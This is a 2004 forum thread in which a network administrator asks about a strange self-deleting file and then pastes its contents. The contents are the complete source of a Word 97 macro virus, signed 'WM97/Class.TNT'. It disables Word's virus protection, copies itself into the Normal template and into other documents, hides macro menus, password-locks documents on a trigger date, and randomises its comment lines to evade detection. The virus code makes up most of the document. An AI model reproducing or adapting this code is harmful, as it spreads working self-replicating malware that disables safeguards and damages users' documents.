startup4.0 - random charcteristics

**rscos** · January 14th, 2004, 10:55 AM

one of our network users (NT4) was experiencing problems logging on, and when we looked at the logs there was a problem with robocopy not being able to copy a particular file called startup4.0 in the user's home directory

the file was located in \\..\profile\office97\word97 root and whenever you try to copy or move it to any other location, it reports copy successfull but then deletes itself from the destination, and if you try to rename it it deletes itself from there

we opened the file and there seemed to be loads of VB/VBS code in it

I've searched google, nai.com and MS KB but can find no reference, although when I searched google under 'try to rename file but deletes itself' I get a vague link through to a samba support site

has anybody seen this before? I'm starting to think the worst and label it virus having no other options, but it doesn't seem to be propogating itself at the moment.

help!!!!!

**DocPC** · January 14th, 2004, 10:58 AM

Did you run a virus scan on the machine in question?

**confus-ed** · January 14th, 2004, 11:02 AM

Originally Posted by rscos

..and whenever you try to copy or move it to any other location, it reports copy successfull but then deletes itself from the destination, and if you try to rename it it deletes itself from there...

Well that activity is viral, so whether you want to call it one or not it is!

**rscos** · January 14th, 2004, 11:02 AM

yes we did - sorry, forgot to mention that - our antivirus is updated as soon as we get an advisory, or otherwise every friday - from mcaffee - absoloutely nothing from that

I'll post up a copy of the contents of the file in text format in a moment

**rscos** · January 14th, 2004, 11:06 AM

these are the contents of the file:

VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Sub AutoOpen()
'684978818411728247812841.18381314475881E+22684978 8184117282478128468497881841172824781284
Dim rsx, rox, xix, xxi As Integer: Dim xxe, xex, exx, exd, cxi, cix, xic, eox, xoe, oxe, cii, rxe, rex, exr, nix, ixn, nxi, lnr, nrl, rnl As String: o = 0: r = 0
'532778724003079528542251.64070728726154E+22532778 7240030795285422553277872400307952854225
Randomize
'500971829764727497546242.36834309592576E+22500971 8297647274975462450097182976472749754624
On Error GoTo 93
'28750593625331089007.2828384528443E+1728750593625 331089002875059362533108900
Options.VirusProtection = Chr(48)
'2691119376547223091841.47264266544525E+2026911193 7654722309184269111937654722309184
Options.SaveNormalPrompt = Chr(48)
'683513964812887224542411.9734582942794E+226835139 648128872245424168351396481288722454241
Options.ConfirmConversions = Chr(48)
'19907799025270855889295.39214460872297E+201990779 9025270855889291990779902527085588929
rt = ActiveDocument.VBProject.VBComponents.Item(Abs(1)) .codemodule.countoflines
'920521668014999889958014.60250704401381E+22920521 6680149998899580192052166801499988995801
dt = NormalTemplate.VBProject.VBComponents.Item(Abs(1)) .codemodule.countoflines
'2851880409373675962491.06567915673945E+2028518804 0937367596249285188040937367596249
If dt > 0 And rt > 0 Then GoTo 93
'3609316032421764091047.85534827212852E+1936093160 3242176409104360931603242176409104
If dt = 0 Then
'63055729881153014426019.64843631438282E+206305572 9881153014426016305572988115301442601
Set tnt = NormalTemplate.VBProject.VBComponents
'282639981611788004311045.05361505590946E+21282639 9816117880043110428263998161178800431104
Set hst = ActiveDocument.VBProject.VBComponents
'669417303615557747230093.72045216491279E+22669417 3036155577472300966941730361555774723009
If Month(Now()) = 12 And Day(Now()) = 23 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83) + Chr(32) + Chr(83) + Chr(65) + Chr(89) + Chr(83) + Chr(32) + Chr(72) + Chr(73)
'63656299204178421761.13576689390643E+186365629920 4178421766365629920417842176
If Month(Now()) = 12 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(84) + Chr(78) + Chr(84)
'59870259856450678932642.69822648087815E+215987025 9856450678932645987025985645067893264
If Month(Now()) = 12 And Day(Now()) = 25 Then Application.ActiveDocument.Password = "TNT"
'296976289005461076980811.62181037570428E+22296976 2890054610769808129697628900546107698081
hst.Item(Abs(1)).Name = tnt.Item(Abs(1)).Name
'6103716124921121377641.2891889328137E+20610371612 492112137764610371612492112137764
hst.Item(Abs(1)).Export Application.StartupPath & System.Version
'95495832576974657180259.30756989041503E+219549583 2576974657180259549583257697465718025
End If
'69510571291126105806257.82762579254236E+206951057 1291126105806256951057129112610580625
If rt = 0 Then Set tnt = ActiveDocument.VBProject.VBComponents
'750918928412771559042.08121614434185E+19750918928 4127715590475091892841277155904
tnt.Item(Abs(1)).codemodule.AddFromFile Application.StartupPath & System.Version
'616533866014016631453612.47638931843154E+22616533 8660140166314536161653386601401663145361
With tnt.Item(Abs(1)).codemodule
'90911898256607523904005.52311513485359E+219091189 8256607523904009091189825660752390400
For j = Chr(49) To Chr(52)
'22943160900695371626011.59540231008421E+212294316 0900695371626012294316090069537162601
.deletelines Chr(49)
'80635553296135701530811.09423680199785E+218063555 3296135701530818063555329613570153081
Next j
'62645642011554220236969.73651245692935E+206264564 2011554220236966264564201155422023696
End With
'99802098011775939735611.77242511553203E+219980209 8011775939735619980209801177593973561
If dt = 0 Then tnt.Item(Abs(1)).codemodule.replaceline 1, "Sub AutoClose()"
'368778252966089049762.24550913267931E+19368778252 9660890497636877825296608904976
If dt = 0 Then tnt.Item(Abs(1)).codemodule.replaceline 99, "Sub ToolsMarco()"
'3109932252547846766447.92363082700997E+1931099322 5254784676644310993225254784676644
If dt = 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'428552102256044222252.59026415170373E+19428552102 2560442222542855210225604422225
With tnt.Item(Abs(1)).codemodule
'6918215062515407195041.06590288796603E+2069182150 6251540719504691821506251540719504
rsx = Int(Rnd(11) * 2998) + 24: rox = Int(Rnd(15) * 5863) + 33: xix = Int(Rnd(44) * 3544) + 55
'4473335689883944253443.95417937599961E+2044733356 8988394425344447333568988394425344
cii = Asc(rsx): eox = Chr$(cii + 5): xoe = Chr$(cii - 14): oxe = Chr$(cii + 22): lnr = Chr$(cii - 4)
'3053888644474947924891.45043807431294E+2030538886 4447494792489305388864447494792489
cix = Asc(rox): rxe = Chr$(cix + 7): rex = Chr$(cix - 16): exr = Chr$(cix + 4): nrl = Chr$(cix - 17)
'6099297604803365329694.89996423051489E+2060992976 0480336532969609929760480336532969
xic = Asc(xix): nix = Chr$(xic + 9): ixn = Chr$(xic - 18): nxi = Chr$(xic + 8): rnl = Chr$(xic - 33)
'39102510241819107801007.11316814162664E+203910251 0241819107801003910251024181910780100
cxi = Asc(xxi): xxe = Chr$(cxi + 4): xex = Chr$(cxi - 3): exx = Chr$(cxi + 18): exd = Chr$(cxi - 12)
'451770774011994024370259.00841933142645E+21451770 7740119940243702545177077401199402437025
If Month(Now()) = 12 And Day(Now()) = 26 Then .replaceline 87, ".replaceline j, Chr(39) & eox & rxe & nix & xoe & rex & ixn & o * o & r * r * o * o & r * r * o & exx & exd & oxe & exr & nix & lnr & nrl & rnl & xxe"
'48790225003760522593611.83476743459815E+214879022 5003760522593614879022500376052259361
rd1 = Int(Rnd(1) * 40) + 1
'87073159696835610255.95198182876851E+188707315969 6835610258707315969683561025
If rd1 = 39 Then .replaceline 87, ".replaceline j, Chr(39) & eox & rxe & nix & xoe & rex & ixn & oxe & exr & nix & lnr & nrl & rnl & xxe & xex & exx & exd & oxe & exr & nix & lnr & nrl & rnl & xxe"
'44580993615065994505642.25847068684232E+214458099 3615065994505644458099361506599450564
End With
'741756119042382484434491.76722240780051E+22741756 1190423824844344974175611904238248443449
With tnt.Item(Abs(1)).codemodule
'38077668225678711914412.58437670972586E+213807766 8225678711914413807766822567871191441
For j = Chr(50) To tnt.Item(Abs(1)).codemodule.countoflines Step Chr(50)
'577633156002777859189161.60458357035809E+22577633 1560027778591891657763315600277785918916
r = Int(Rnd(412835) * 303989) + 8485
'271775007363319154066419.02063120827552E+21271775 0073633191540664127177500736331915406641
o = Int(Rnd(487958) * 785865) + 2988
'257118018014838510128361.24406813432523E+22257118 0180148385101283625711801801483851012836
.replaceline j, Chr(39) & r * r & o * o & r * r * o * o & r * r & o * o & r * r & o * o
'7055239068925425797761.79385081714302E+2070552390 6892542579776705523906892542579776
Next j
'603291844001379201333768.3206091589133E+216032918 440013792013337660329184400137920133376
End With
'5141102764176002884002.14692599527004E+2051411027 6417600288400514110276417600288400
93:
'455109688891778005288968.0918743390336E+214551096 888917780052889645510968889177800528896
If dt <> 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'742764163691969504516811.46287737531206E+22742764 1636919695045168174276416369196950451681
End Sub
'9200908893173249158562.91967763931797E+2092009088 9317324915856920090889317324915856
Sub ViewVBCode()
'215564060412803755450256.04388909252558E+21215564 0604128037554502521556406041280375545025
End Sub 'WM97/Class.TNT by Virus

Smile
'1609599690039316662096.32840871118988E+1916095996 9003931666209160959969003931666209